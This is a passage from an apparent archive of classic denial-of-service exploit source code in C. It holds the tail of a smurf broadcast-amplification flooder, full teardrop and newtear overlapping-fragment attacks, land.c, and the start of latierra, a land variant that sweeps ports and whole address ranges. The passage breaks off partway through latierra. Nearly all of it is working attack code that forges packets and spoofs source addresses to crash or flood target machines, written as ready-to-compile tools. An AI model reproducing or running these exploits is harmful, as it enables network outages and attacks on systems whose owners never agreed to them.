sm.udp = 1;
break;
}
puts("Error: Protocol must be icmp, udp or both");
exit(-1);
/* source port */
case 's':
sm.srcport = (u_short) atoi(optarg);
break;
/* specify packet size */
case 'S':
sm.psize = atoi(optarg);
break;
/* filename to read padding in from */
case 'f':
/* open and stat */
if ((fd = open(optarg, O_RDONLY)) == -1)
{
perror("Opening packet data file");
exit(-1);
}
if (fstat(fd, &st) == -1)
{
perror("fstat()");
exit(-1);
}
/* malloc and read */
sm.padding = (char *) malloc(st.st_size);
if (read(fd, sm.padding, st.st_size) < st.st_size)
{
perror("read()");
exit(-1);
}
sm.psize = st.st_size;
close(fd);
break;
default:
usage(argv[0]);
}
} /* end getopt() loop */
/* create packet padding if neccessary */
if (!sm.padding)
{
sm.padding = (char *) malloc(sm.psize);
memset(sm.padding, 0, sm.psize);
}
/* create the raw socket */
if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
{
perror("Creating raw socket (are you root?)");
exit(-1);
}
/* Include IP headers ourself (thanks anyway though) */
if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
{
perror("setsockopt()");
exit(-1);
}
/* read in our broadcasts and store them in our array */
while (fgets(buf, sizeof buf, bcastfile) != NULL)
{
char *p;
int valid;
/* skip over comments/blank lines */
if (buf[0] == '#' || buf[0] == '\n') continue;
/* get rid of newline */
buf[strlen(buf) - 1] = '\0';
/* check for valid address */
for (p = buf, valid = 1; *p != '\0'; p++)
{
if ( ! isdigit(*p) && *p != '.' )
{
fprintf(stderr, "Skipping invalid ip %s\n", buf);
valid = 0;
break;
}
}
/* if valid address, copy to our array */
if (valid)
{
bcast[num] = inet_addr(buf);
num++;
if (num == 1024)
break;
}
} /* end bcast while loop */
/* seed our random function */
srand(time(NULL) * getpid());
/* wee.. */
for (n = 0, cycle = 0; n < sm.num || !sm.num; n++)
{
if (sm.icmp)
smurficmp(&sm, bcast[cycle]);
if (sm.udp)
{
int x;
for (x = 0; sm.dstport[x] != 0; x++)
smurfudp(&sm, bcast[cycle], x);
}
/* quick nap */
usleep(sm.delay);
/* cosmetic psychadelic dots */
if (n % 50 == 0)
{
printf(".");
fflush(stdout);
}
cycle = (cycle + 1) % num;
}
exit(0);
}
void
usage (char *s)
{
fprintf(stderr,
"usage: %s <source host> <broadcast file> [options]\n"
"\n"
"Options\n"
"-p: Comma separated list of dest ports (default 7)\n"
"-r: Use random dest ports\n"
"-R: Use random src/dest ports\n"
"-s: Source port (0 for random (default))\n"
"-P: Protocols to use. Either icmp, udp or both\n"
"-S: Packet size in bytes (default 64)\n"
"-f: Filename containg packet data (not needed)\n"
"-n: Num of packets to send (0 is continuous (default))\n"
"-d: Delay inbetween packets (in ms) (default 10000)\n"
"\n", s);
exit(-1);
}
u_long
resolve (char *host)
{
struct in_addr in;
struct hostent *he;
/* try ip first */
if ((in.s_addr = inet_addr(host)) == -1)
{
/* nope, try it as a fqdn */
if ((he = gethostbyname(host)) == NULL)
{
/* can't resolve, bye. */
herror("Resolving victim host");
exit(-1);
}
memcpy( (caddr_t) &in, he->h_addr, he->h_length);
}
return(in.s_addr);
}
void
getports (struct smurf_t *sm, char *p)
{
char tmpbuf[16];
int n, i;
for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++)
{
if (*p == ',')
{
tmpbuf[i] = '\0';
sm->dstport[n] = (u_short) atoi(tmpbuf);
n++; i = -1;
continue;
}
tmpbuf[i] = *p;
}
tmpbuf[i] = '\0';
sm->dstport[n] = (u_short) atoi(tmpbuf);
sm->dstport[n + 1] = 0;
}
void
smurficmp (struct smurf_t *sm, u_long dst)
{
struct ip *ip;
struct icmp *icmp;
char *packet;
int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize;
packet = malloc(pktsize);
ip = (struct ip *) packet;
icmp = (struct icmp *) (packet + sizeof(struct ip));
memset(packet, 0, pktsize);
/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_ICMP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;
/* fill in ICMP header */
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); /* thx griffin */
/* send it on its way */
if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}
free(packet); /* free willy! */
}
void
smurfudp (struct smurf_t *sm, u_long dst, int n)
{
struct ip *ip;
struct udphdr *udp;
char *packet, *data;
int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize;
packet = (char *) malloc(pktsize);
ip = (struct ip *) packet;
udp = (struct udphdr *) (packet + sizeof(struct ip));
data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr));
memset(packet, 0, pktsize);
if (*sm->padding)
memcpy((char *)data, sm->padding, sm->psize);
/* fill in IP header */
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = FIX(pktsize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = FIX( getpid() );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0;
ip->ip_src.s_addr = sm->sin.sin_addr.s_addr;
ip->ip_dst.s_addr = dst;
/* fill in UDP header */
if (sm->srcport) udp->uh_sport = htons(sm->srcport);
else udp->uh_sport = htons(rand());
if (sm->rnd) udp->uh_dport = htons(rand());
else udp->uh_dport = htons(sm->dstport[n]);
udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize);
// udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp));
/* send it on its way */
if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin,
sizeof(struct sockaddr)) == -1)
{
perror("sendto()");
exit(-1);
}
free(packet); /* free willy! */
}
u_short
in_chksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
/* EOF */
----- cut ----- cut -----
----- teardrop.c ----- cut ----- cut -----
/*
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux kernels and
* NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}
----- cut ----- cut -----
----- newtear.c ----- cut ----- cut -----
/* Newtear.c
* Seemingly, a new teardrop type exploit. Affects NT4, and Win95.
*
* Discovered 01/08/1998
*
* Updated notes:
* This is a new version of teardrop. It affects NT 4 and Win95 machines with all
* current patches and hotfixes. Causes a bluescreen in both operating systems.
* Linux appears unaffected, other *NIXes untested. Differences are:
*
* Smaller padding data size (20 bytes instead of 28 in previous teardrop)
* Faked out UDP total length. (Increased reported UDP length to twice what it really is)
*
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux kernels and
* NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x14 /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 */
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
/*
* Send two IP fragments with pathological offsets. We use an implementation
* independent way of assembling network packets that does not rely on any of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
/*
* Grab some memory for our packet, align p_ptr to point at the beginning
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING*2); /* UDP total length */ /* Increases UDP total length to 48 bytes
Which is too big! */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to work
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the header */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",
name);
exit(0);
}
----- cut ----- cut -----
----- land.c ----- cut ----- cut -----
/* land.c by m3lt, FLC
crashes a win95 box */
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
fprintf(stderr,"land.c by m3lt, FLC\n");
if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IP_TCP;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}
fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
close(sock);
return(0);
}
----- cut ----- cut -----
----- latierra.c ----- cut ----- cut -----
/**************************************************************/
/* */
/* La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net */
/* */
/* Modified version of land.c by m3lt, FLC */
/* */
/* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */
/* gcc version 2.7.2.1 tabs set to 3 */
/* */
/* gcc latierra.c -o latierra */
/* */
/* Refer to readme.txt for more details and history */
/* */
/**************************************************************/
#include <stdio.h>
#include <getopt.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#define DEFAULT_FREQUENCY 1
#define TRUE 1
#define FALSE 0
#define FOR_EVER -5
#define LIST_FILE 1
#define ZONE_FILE 2
#define MAXLINELENGTH 512
#define DEFAULT_SEQ 0xF1C
#define DEFAULT_TTL 0xFF
#define DEFAULT_TCPFLAGS (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE 0xFDE8
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
typedef struct latierra_data
{
char dest_ip[256];
int tcp_flags;
int window_size;
int ip_protocol;
int sequence_number;
int ttl;
int supress_output;
int message_type;
} LATIERRA_DATA;
void alternatives(void);
int get_ip(int use_file, FILE *fp, char *buff);
int land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);
/********/
/* main */
/********/
int main(int argc, char **argv)
{
FILE *fp;
LATIERRA_DATA ld;
int frequency = DEFAULT_FREQUENCY, x;
int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
char got_ip = FALSE, got_beg_port = FALSE;
char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
printf("Enhanced version of land.c originally developed by m3lt, FLC\n");
strcpy(valid_tcp_flags, "fsrpau");
ld.tcp_flags = 0;
ld.window_size = DEFAULT_WINSIZE;
ld.ip_protocol = IP_TCP;
ld.sequence_number = DEFAULT_SEQ;
ld.ttl = DEFAULT_TTL;
ld.message_type = 0;
if(argc > 1 && (!strcmp(argv[1], "-a")))
alternatives();
if(argc > 1 && (!strcmp(argv[1], "-n")))
nslookup_help();
if(argc > 1 && (!strcmp(argv[1], "-p")))
protocol_list();
if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
print_arguments();
while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
{
switch(i)
{
case 't':
for(x=0;x<strlen(optarg);x++)
switch(optarg[x])
{
case 'f': /* fin */
ld.tcp_flags |= TH_FIN;
break;
case 's': /* syn */
ld.tcp_flags |= TH_SYN;
break;
case 'r': /* reset */
ld.tcp_flags |= TH_RST;
break;
case 'p': /* push */
ld.tcp_flags |= TH_PUSH;
break;
case 'a': /* ack */
ld.tcp_flags |= TH_ACK;
break;
case 'u': /* urgent */
ld.tcp_flags |= TH_URG;
break;
default:
printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]);
return(-12);
break;
}
break;
case 'q':
ld.sequence_number = atoi(optarg);
break;
case 'w':
ld.window_size = atoi(optarg);
break;
case 'm':
ld.message_type = atoi(optarg);
break;
case 'v':
ld.ttl = atoi(optarg);
break;
case 'p':
ld.ip_protocol = atoi(optarg);
break;
case 'o':
ld.supress_output = TRUE;
break;
case 'i':
if(strlen(optarg) > 1)
strcpy(ld.dest_ip, optarg);
else
{
printf("ERROR: Must specify valid IP or hostname.\n");
return(-6);
}
got_ip = TRUE;
break;
case 's':
frequency = atoi(optarg);
break;
case 'l':
loop = atoi(optarg);
break;
case 'b':
beginning_port = atoi(optarg);
got_beg_port = TRUE;
break;
case 'e':
ending_port = atoi(optarg);
break;
}
}
if(!ld.tcp_flags)
ld.tcp_flags = DEFAULT_TCPFLAGS;
if(!got_beg_port)
{
fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n");
return(-7);
}
if(ending_port == 0)
ending_port = beginning_port;
printf("\nSettings:\n\n");
printf(" (-i) Dest. IP Addr : ");
if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
{
ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
strcpy(class_c_addr, ld.dest_ip);
strcat(ld.dest_ip, "1");
printf(" %s (Class C range specified).\n", ld.dest_ip);
increment_addr = TRUE;
octet = 1;
}
else
if(strlen(ld.dest_ip) > 5)
{
if(strncmp(ld.dest_ip, "zone=", 5)==0)
{
strcpy(filename, &ld.dest_ip[5]);
printf("%s (using DNS zone file)\n", filename);
use_file = ZONE_FILE;
}
else if(strncmp(ld.dest_ip, "list=", 5) == 0)
{
strcpy(filename, &ld.dest_ip[5]);
printf("%s (using ASCII list)\n", filename);
use_file = LIST_FILE;
}
else
printf("%s\n", ld.dest_ip);
}
else
{
printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
return(-9);
}
printf(" (-b) Beginning Port #: %d\n", beginning_port );
printf(" (-e) Ending Port # : %d\n", ending_port );
printf(" (-s) Seconds to Pause: %d\n", frequency );
printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? "(forever)" : " " );
printf(" (-w) Window size : %d\n", ld.window_size );
printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
printf(" (-v) Time-to-Live : %d\n", ld.ttl);
printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol );
printf(" (-t) TCP flags : ");
strcpy(buff, "");
if( ld.tcp_flags & TH_FIN)
strcat(buff, "fin ");
if( ld.tcp_flags & TH_SYN)
strcat(buff, "syn ");
if(ld.tcp_flags & TH_RST)
strcat(buff, "rst ");
if(ld.tcp_flags & TH_PUSH)
strcat(buff, "push ");
if(ld.tcp_flags & TH_ACK)
strcat(buff, "ack ");
if(ld.tcp_flags & TH_URG)
strcat(buff, "urg ");
printf("%s\n\n", buff);
if(ending_port < beginning_port)
{
printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
return(-8);
}
scan_loop = loop_val = loop;
if(use_file)
{
if(access(filename, 0))
{
printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
return(-9);
}
if( (fp = fopen(filename, "rt")) == NULL)
{
printf("ERROR: Unable to open %s.\n", filename);
return(-10);
}
if(!get_ip(use_file, fp, buff))
{
printf("Unable to get any IP address from file %s.\n");
return(-11);
}
strcpy(ld.dest_ip, buff);
}
while( (loop == FOR_EVER) ? 1 : loop-- > 0)
{
for(i=beginning_port; i <= ending_port; i++)
{
if(land(&ld, i)) /* go for it BaBy! */
break;
if(frequency) /* make sure freq > 0 */
{
if(!ld.supress_output)
printf("-> paused %d seconds.\n", frequency);
sleep(frequency);
}
}
if( (!use_file) && (loop && increment_addr) )
{
char temp_addr[21];
if(++octet > 254) /* check for reset */
{
if(loop_val != FOR_EVER) /* make sure not to distrute forever! */
{
if(++scan_loop > loop_val) /* check if scanned x times */
break;
else
